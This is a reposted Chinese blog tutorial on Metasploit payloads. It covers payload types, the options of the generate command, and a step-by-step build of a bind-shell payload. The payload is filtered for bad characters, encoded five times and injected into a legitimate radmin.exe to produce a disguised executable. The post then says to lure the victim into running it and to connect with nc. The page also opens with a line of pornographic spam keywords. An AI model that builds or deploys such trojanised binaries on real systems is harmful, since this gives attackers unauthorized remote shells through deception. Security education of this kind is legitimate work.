国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

這篇具有很好參考價值的文章主要介紹了【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

一、簡介:

1.1、payload(攻擊載荷):

1.2、Shellcode:

二、payload分類

2.1、singles(獨立載荷)

2.2、stagers(傳輸器載荷)

2.2.1、簡介:

2.2.2、特點:

2.2.3、分類:

2.3、stages(傳輸體載荷)

2.3.1、簡介:

2.3.2、示例:

三、相關命令

四、使用方法:

4.1、方法一:

4.2、方法二:

4.2.1、第一步:還是選擇模塊

4.2.2、第二步:直接使用payload

4.2.3、第三步:考慮過濾壞字符

4.2.4、第四步:考慮多次加密、輸出格式等

4.2.5、第五步:誘使用戶使用程序

4.2.6、第六步:連接目標端口


一、簡介:

1.1、payload(攻擊載荷):

主要是用來建立目標機與攻擊機穩(wěn)定連接的,可返回shell,也可以進行程序注入等,payloads也被稱為shellcode。

一般在exploit中調用payload

也可以使用 generate 命令直接生成payload


exploit是利用漏洞的一個過程和方法,最終的目的是為了執(zhí)行payload(攻擊代碼)


1.2、Shellcode:

是一段代碼(或填充數(shù)據(jù)),作為數(shù)據(jù)發(fā)送到目標服務器利用特定漏洞的代碼,用于獲取權限。



二、payload分類

2.1、singles(獨立載荷)

可直接植入目標系統(tǒng)并執(zhí)行相應的程序(payload:shell_bind_tcp)

2.2、stagers(傳輸器載荷)

2.2.1、簡介:

用于目標機與攻擊機之間建立穩(wěn)定的網絡連接,與傳輸體載荷配合攻擊。


2.2.2、特點:

為在漏洞利用后方便注入,載荷體積都非常小,且這類載荷功能都非常相似


2.2.3、分類:

bind型,需要攻擊機主動連接目標端口

reverse型,目標機會反連接攻擊機,提前設定好連接攻擊機的ip地址和端口號

2.3、stages(傳輸體載荷)

2.3.1、簡介:

stagers建立連接后,攻擊機將stages傳輸給目標機,由stagers進行相應處理,將控制權轉交給stages。


2.3.2、示例:

得到目標機的shell或meterpreter控制程序運行

攻擊機可以在本端輸入相應命令控制目標機。



三、相關命令

選項:

-E? ? ? ?

編碼


-O <opt> ?

棄用:“ -o”選項的別名


-P <opt> ?

總所需有效載荷尺寸,自動生產適當?shù)腘OP雪橇長度


-S <opt> ?

生成(大)Windows二進制文件時要使用的新部分名稱


-b <opt> ?

字符列表避免示例:'\ x00 \ xff'


-e <opt> ?

用于使用的編碼器


-f <opt> ?

輸出格式:base32,base64,bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war


-h ? ? ? ?

顯示此消息


-i <opt> ?

編碼有效載荷的次數(shù)


-k ? ? ? ?

保留模板行為并將有效載荷注入新線程


-n <opt> ?

在有效載荷上預先設置[長度]大小的點頭


-o <opt> ?

輸出文件名(否則stdout)


?-p <opt> ?

有效載荷的平臺


-v ? ? ? ?

詳細輸出


-x <opt> ?

指定自定義可執(zhí)行文件以用作模板



四、使用方法:

4.1、方法一:

一般的使用方法

使用exploit時,用 use 去使用的payload(即set調用各種payload)

4.2、方法二:

直接使用payload:直接用 use 使用一個payload


4.2.1、第一步:還是選擇模塊

#查看payload模塊,也可以輸入關鍵字然后會檢索出來

use payload/

use payload/windows/shell_bind_tcp

show options?

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

LPORT:

監(jiān)聽端口,也就是目標開放的端口

RHOST:

目標機器只接受某個遠程主機來連接它的4444端口(目標開放的端口),限制了來源IP(不設置的話,都可以連上去獲取shell)


4.2.2、第二步:直接使用payload

使用 generate 命令來生成payload

輸入generate

可以獲得payload的一些基本信息和設置的參數(shù),buf 就是 payload 的16進制表示方式

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法


4.2.3、第三步:考慮過濾壞字符

產生的payload中可能存在“壞字符”

被執(zhí)行過程中會被過濾掉、或被替代,導致無法產生預期結果

eg:

緩沖區(qū)溢出中,會把?“\x00”認為是一個壞字符,導致shellcode無法執(zhí)行


生成payload時(默認不使用encoder)

比如過濾掉 “\x00” 就會從已有的encoder中選擇最理想的一個

也可以手動指定encoder

#顯示可用的encoders

show encoders

#使用指定的encoder

generate -e x86/add_sub

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法


壞字符太多,就需要自己手動加上去

generate -b '\x00\xff'

利用 -b 參數(shù),后面跟上要避免出現(xiàn)的壞字符(也就是過濾掉)

壞字符一般不止一個

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法


過濾掉壞字符后的payload大小也變化了

“\x00”可能由1個字節(jié)變成2個甚至更多字節(jié)去表示

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

?【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法


4.2.4、第四步:考慮多次加密、輸出格式等

#研究一下輸出格式之間代碼是否有區(qū)別

?#輸出python使用的payload

generate -f?python?LHOST=192.168.190.131

LHOST是填自己的

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

#輸出python使用的payload

generate -f?c LHOST=192.168.190.131

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

對比可以發(fā)現(xiàn),其實c語言格式輸出的,和python格式輸出的是存在不一樣的

#完整的一個輸出exe文件

generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o /root/1.exe

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法

打開目錄位置 /root/1.exe

【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法


4.2.5、第五步:誘使用戶使用程序

將exe文件拷貝/發(fā)送到目標主機上運行


4.2.6、第六步:連接目標端口

nc IP 端口號文章來源地址http://www.zghlxwxcb.cn/news/detail-401738.html

到了這里,關于【MSFconsole進階】Payload(攻擊載荷模塊):payload分類、相關命令、使用方法的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • Android A/B System OTA分析(六)如何獲取 payload 的 offset 和 size

    Android A/B System OTA分析(六)如何獲取 payload 的 offset 和 size

    Android A/B 系統(tǒng)基礎入門系列《Android A/B 系統(tǒng)》已完結,文章列表: Android A/B System OTA分析(一)概覽 Android A/B System OTA分析(二)系統(tǒng)image的生成 Android A/B System OTA分析(三)主系統(tǒng)和bootloader的通信 Android A/B System OTA分析(四)系統(tǒng)的啟動和升級 Android A/B System OTA分析(五)客戶

    2024年01月22日
    瀏覽(21)
  • 小米手機無需刷入Recovery獲取Root權限,卡刷包payload.bin提取boot.img文件

    注意一下操作都需要解bl鎖,退出手機賬號,備份數(shù)據(jù),打開use調試才可以 (1)https://xiaomirom.com/ 下載線刷包 .tgz 解壓 (2)https://xiaomirom.com/download-xiaomi-flash-tool-miflash/ 下載線刷工具 (1)下載卡刷包,解壓獲得payload.bin文件 (2)下載payload_dumper-win64,將payload.bin文件放到payload_input目錄下

    2024年02月11日
    瀏覽(80)
  • Nginx報錯 HTTP 413 Request Entity Too Large(Payload Too Large)解決方案

    上傳文件時,請求參數(shù)過大,導致超出服務端限制。 客戶端發(fā)送的實體主體部分比服務器能夠或者希望處理的要大。? Nginx默認最大能夠上傳1MB文件,打開nginx.conf在http{}中,找到server{}設置: client_max_body_size 30m;(配置客戶端請求實體最大值) client_body_buffer_size 128k;(配置請

    2024年02月07日
    瀏覽(24)
  • 【計算機網絡】TCP中payload的解析,在python中的體現(xiàn)?字節(jié)、字符?為啥字節(jié)用十六進制表示?

    【計算機網絡】TCP中payload的解析,在python中的體現(xiàn)?字節(jié)、字符?為啥字節(jié)用十六進制表示?

    問題來源 最近要根據(jù)一份國家標準協(xié)議進行解碼,但是對于進制,字節(jié),字符,編碼,轉碼有比較多的問題。其中我想實現(xiàn)的主要需求如下: 有客戶端與服務端,進行tcp通信,客戶端要發(fā)送一個請求,tcp中payload請求大概是這樣,有很多個十六進制表示的字節(jié)組成 根據(jù)協(xié)議的

    2024年02月11日
    瀏覽(27)
  • 內網安全:Msfconsole攻擊技術(成功拿下服務器最高權限.)

    內網安全:Msfconsole攻擊技術(成功拿下服務器最高權限.)

    Msfconsole簡稱(msf)是一款 常用的滲透測試工具 ,包含了常見的漏洞利用模塊和生成各種木馬,方便于 安全測試人員的使用 . ?????????????????Msfconsole的使用: ? ? ? ? 第一步:進行端口掃描. ? ? ? ? 第二步:進行服務的掃描. ? ? ? ? 第三步:掃描3306(Mysql)端

    2024年02月16日
    瀏覽(24)
  • 【MSFconsole工具】下載、啟動方法、msf常用基礎命令、模塊功能、核心命令(入門初識)

    【MSFconsole工具】下載、啟動方法、msf常用基礎命令、模塊功能、核心命令(入門初識)

    目錄 一、簡介: 二、下載: 2.1、kali 2.2、官網: 2.3、GitHub: 三、啟動方法 四、msf常用基礎命令 五、msf結構 六、?核心命令: 很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊 附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具 kali linux 新版已內置metasploit,已經沒有metasploi

    2024年02月05日
    瀏覽(35)
  • Metasploit——滲透攻擊模塊(Exploit)

    Metasploit——滲透攻擊模塊(Exploit)

    Metasploit常用命令、技術功能模塊 ? Metasploit——輔助模塊(Auxiliary)? 目錄 1.Exploit模塊 2.生成Payload? 3.Meterpreter常用命令 4.弱點掃描 Active exploits主動:攻擊者主動向目標發(fā)起漏洞利用代碼,觸發(fā)漏洞 ??????????? 目標開放一個端口(服務),允許外界計算機連接這個端口(訪問

    2024年02月11日
    瀏覽(53)
  • 網絡安全進階學習第二課——XSS跨站腳本攻擊

    首先了解什么是前端。前端從定義上來講是指一個網站的前臺部分,是展示給用戶看的部分。它不需要關注任何業(yè)務之間的邏輯處理,只需要安安靜靜地做好自己,老老實實的把自己最美的一面展示給用戶。 Cookie 是在 HTTP 協(xié)議下,服務器或腳本可以維護客戶工作站上信息的

    2024年02月11日
    瀏覽(25)
  • Unity進階–通過PhotonServer實現(xiàn)人物移動和攻擊–PhotonServer(五)

    Message peer類 客戶端對接類 BLL管理 } 移動BLL 邏輯類 角色綁定的類

    2024年02月12日
    瀏覽(19)
  • SQL注入進階:掌握聯(lián)合查詢注入和報錯注入攻擊技巧

    SQL注入進階:掌握聯(lián)合查詢注入和報錯注入攻擊技巧

    數(shù)據(jù)來源 ????????本文僅用于信息安全的學習,請遵守相關法律法規(guī),嚴禁用于非法途徑。若觀眾因此作出任何危害網絡安全的行為,后果自負,與本人無關。 介紹 ????????聯(lián)合查詢注入是SQL注入的一種,通過在原有的SQL語句中添加UNION(聯(lián)合)操作,將惡意構造的

    2024年02月06日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包